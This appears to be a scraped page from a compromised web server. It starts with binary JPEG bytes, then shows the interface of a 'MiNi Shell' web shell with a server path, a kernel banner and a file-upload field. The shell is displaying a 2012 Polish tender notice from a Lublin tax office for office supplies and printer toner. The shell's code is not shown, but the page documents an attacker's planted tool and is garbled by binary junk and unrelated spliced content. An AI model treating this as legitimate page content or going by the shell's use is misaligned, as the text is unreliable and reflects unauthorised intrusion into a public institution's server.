JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120330/99496-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa materiałów biurowych i materiałów eksploatacyjnych dla Trzeciego Urzędu Skarbowego w Lublinie</b><br>
<b>Numer ogłoszenia: 99496 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Trzeci Urząd Skarbowy w Lublinie , ul. Gabriela Narutowicza 56, 20-016 Lublin, woj. lubelskie, tel. 081 5343982, faks 081 5324713.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3us.is.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i materiałów eksploatacyjnych dla Trzeciego Urzędu Skarbowego w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przewidywane zapotrzebowanie Zamawiającego na 12 miesięcy.
Papier biały ksero A4  gramatura 80?2 g/m2, wilgotność 3,8-5,0 %, białość CIE 161, gładkość 180?50, cm3/min  cm, grubość 108?3 ?m,(Papier kserograficzny 30197644-2) 2000 ryz
Blok w kratkę A4  z makulatury (100k) w kratkę (bloki papierowe 22816000-3) 50 szt.
Blok w kratkę A5 z makulatury (50k) w kratkę (bloki papierowe 22816000-3)180 szt.
Cienkopis czarny grubość linii 0,4 mm, obudowa plastikowa (pisaki 30192125-3) 200 szt.
Cienkopis czerwony grubość linii 0,4 mm, obudowa plastikowa (pisaki 30192125-3)
200 szt.
Datownik samotuszujący plastikowy- w automacie (datowniki 30192150-7)10 szt.
Długopis stojący na sprężynce z przylepcem - wkład niebieski wymienny (długopisy 30192121-5) 70 szt.
Długopis typu zenith, gumowa rękojeść, długość linii pisania min. 2500m - wkład niebieski (długopisy kulkowe 30192121-5) 200 szt.
Dziurkacz metalowy, dziurkujący jednorazowo min.20, max. 30 kartek 80g/m2 (dziurkacze 30197330-8) 10 szt.
Gumka ołówkowa - mała (gumki 30192100-2) 200 szt.
Karteczki samoprzylepne min. 76 x 76 mm kolor żółty (bloczki samoprzylepnych karteczek na notatki 22816300-6) 320 bloczków (1bloczek/100 szt.) 
Klej biurowy ok. 36g (kleje 24910000-6) 30 szt.
Koperta brązowa B-4 HK (wymiar: 250 x 353 mm) (koperty 30199230-1) 2000 szt.
Koperta brązowa B-4 HK RBD (wymiar: 250 x 353 x 38 mm) (koperty 30199230-1)
2000 szt.
Koperta brązowa C-4 HK (wymiar: 229 x 324 mm) (koperty 30199230-1) 5000 szt
Koperta brązowa C-5 HK (wymiar: 162 x 229 mm) (koperty 30199230-1)
10 000 szt.
Koperta biała C-6 SK bez okienka (koperty 30199230-1) 10 000 szt.
Koperta biała C-6 SK z okienkiem prawym (koperty 30199230-1) 25 000 szt.
Koperta biała DL SK z okienkiem prawym (koperty 30199230-1) 45 000 szt.
Koperta  brązowa E-4 HK RBD (wymiar: 280 x 400 x 40 mm) (koperty 30199230-1)1000 szt.
Korektor w piórze poj. 8Ml,  szybkoschnący (w piórze nie gęstnieje i nie wysycha) (korektory 30192160-0) 200 szt.
Koszulka foliowa A4 przezroczysta , antyelektrostatyczna pasek z multiperforacją (50mic do 55 mic) (wyroby biurowe  30192000-1) 60 op (100 szt. w op.)
Księga korespondencyjna (min. 190 k) (rejestry papierowe lub tekturowe 22810000-1) 10 szt.
Marker czarny końcówka stożkowa 1-2 mm wodoodporny, szybkoschnący, nietoksyczny (markery 30237430-2) 40 szt.
Nożyczki o długości min.150mm max.200mm (nożyczki 39241200-5) 10 szt.
Nożyk do papieru w plastikowej obudowie z wysuwanym ostrzem z blokadą (noże 39241100-4) 10 szt.
Ołówek HB z gumką (ołówki 30192130-1) 200 szt.
Rozszywacz (sprzęt biurowy 30191000-4) 10 szt.
Segregator A4 plastikowy (75mm) z mechanizmem dźwigniowym , oklejony na zewnątrz, dwustronna wymienna etykieta od opisu na grzbiecie, okute dolne krawędzie (segregatory, pudełka na listy, do przechowywania i podobne wyroby 30199500-5) 300 szt.
Segregator zwykły (marmurek) A4 75 mm z mechanizmem standardowym, wzmocniony metalową listwą (segregatory, pudełka na listy, do przechowywania i podobne wyroby 30199500-5) 300 szt.
Skoroszyt A4 (plastikowy) wykonane z mocnego i sztywnego PCV,  przednia okładka sztywna przezroczysta z wsuwanym paskiem do opisów, druga kolorowa (skoroszyty i podobne wyroby 22850000-3) 100 szt.
Skoroszyt kartonowy zwykły z nadrukiem A4 280 g/m2 z (skoroszyty  i podobne wyroby 22850000-3) 6000 szt.
Spinacze biurowe o dł. min.50 mm max.55mm (spinacze do papieru 30197220-4)
10 op. (1 op/100 szt.)
Sznurek (min. 100 m) (sznurek 39541130-6) 2 szt.
Teczka wiązana kartonowa A4 biała 350g/m2 (papier i tektura gotowe 30197600-2)1000 szt.
Tusz do pieczątek 30 ml. Polimerowych i kauczukowych (czerwony) (tusz 22600000-6) 24 szt.
Tusz do stempli metalowych czerwony (tusz 22600000-6) 2 szt.
Wkład do długopisu z pozycji 8, długość linii pisania  min. 2500m (niebieski) (wyroby biurowe 30192000-1) 600 szt.
Wkład do długopisu (niebieski) z poz. 7 (wyroby biurowe 30192000-1) 50 szt.
Zakreślacz grubość lini 1-5 mm (pisaki 30192125-3) 200 szt.
Kalka kopiująca A4 z woskiem (ołówkowa) 5 arkuszy (1 arkusz/50 szt.)
Zszywacz do 30 kartek (80g/m2), pasujący do zszywek z poz. 43 (zszywacze 30197320-5) 15 szt.
Zszywki 24/6 (zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie 30197100-7) 500 op. (1 op/1000 szt.)
Maczałka - Zwilżacz Glicerynowy 10 szt.
Etykiety termiczne białe matowe samoprzylepne 70mmx30mm do drukarki ZEBRA TLP 2844 50 rolek (1 rolka/1000 szt.)
Etykiety samoklejące białe (7 etykiet na kartce A4  o wymiarach 192x38mm) 10 op. (1 op./700 szt.)
Taśma klejąca biurowa przezroczysta 18mmx10m 20 szt.
Etykiety samoprzylepne do segregatora szer. 7 cm 500 szt.
Przekładki A4 do segregatorów, alfabetyczne, wykonane z mocnego i elastycznego plastiku, uniwersalna perforacja 2 op. (1 op/21 kart)

Toner do drukarki HPLaserJet 1200  o wydajności min. 2250 stron przy 5% zaczernieniu (wkłady drukujące 30192113-6) 1 szt.
Toner do drukarki HPLaserJet 1320  o wydajności min. 2250 stron przy 5% zaczernieniu (wkłady drukujące 30192113-6) 9 szt.
Toner do drukarki HP LaserJet P2015 dn  o wydajności min. 7000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 40 szt.
Toner do drukarki HP LaserJet P2055 dn  o wydajności min. 7000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 20 szt.
Toner do drukarki HP LaserJet P2300 dn  o wydajności min. 7000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 10 szt.
Toner do drukarki HP LaserJet 3005dn  o wydajności min. 13 000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 20 szt.
Toner do drukarki HP LaserJet 3015 o wydajności min. 12000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 8 szt.
Toner czarny do drukarki HP LaserJet 3600 o wydajności min. 12000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 4 szt.
Toner (kolory) do drukarki HP LaserJet 3600 o wydajności min. 12000 stron A4 
(wkłady drukujące 30192113-6) 2 kpl. (3 kolory)
Toner do drukarki HP LaserJet 4015 o wydajności min. 24000 stron A4 przy 5% zaczernieniu(wkłady drukujące 30192113-6) 2 szt.
Toner do drukarki HP LaserJet 4100  o wydajności min. 9000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 2 szt.
Toner do drukarki HP LaserJet 4300  o wydajności min. 9000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 1 szt.
Toner do Fax Panasonic KX-FL513 o wydajności min. 2370 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 9 szt.
Toner do Fax Panasonic UF-4100 o wydajności min. 6000 stron A4 przy 5% zaczernieniu (wkłady drukujące 30192113-6) 3 szt.
Tusz do Priport Ricoch JP 3000 4 szt.
Toner do kopiarki Nashuatec MP161LN 3 szt.
Toner do kopiarki Sharp MX2700N (czarny) o wydajności min. 4000 kopii stron A4 przy 5% zaczernieniu 1 szt.
Toner do kopiarki Sharp MX2700N (kolory) o wydajności min. 4000 kopii stron A4 
1 kpl. (3 kolory)
Toner do kopiarki Canon IR 1022A o wydajności min. 2000 kopii stron A4 przy 5% zaczernieniu 15 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.19.76.44-2, 30.19.21.25-3, 30.19.21.21-5, 30.19.71.21-5, 22.81.63.00-6, 30.19.92.30-1, 30.19.95.00-5, 22.85.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3us.is.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Trzeci Urząd Skarbowy w Lublinie
20-016 Lublin
ul. Narutowicza 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 10:00, miejsce: Trzeci Urząd Skarbowy w Lublinie ul. Narutowicza 56, 20-016 Lublin w pokoju 016, sekretariacie pok. 205 lub przesłać za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com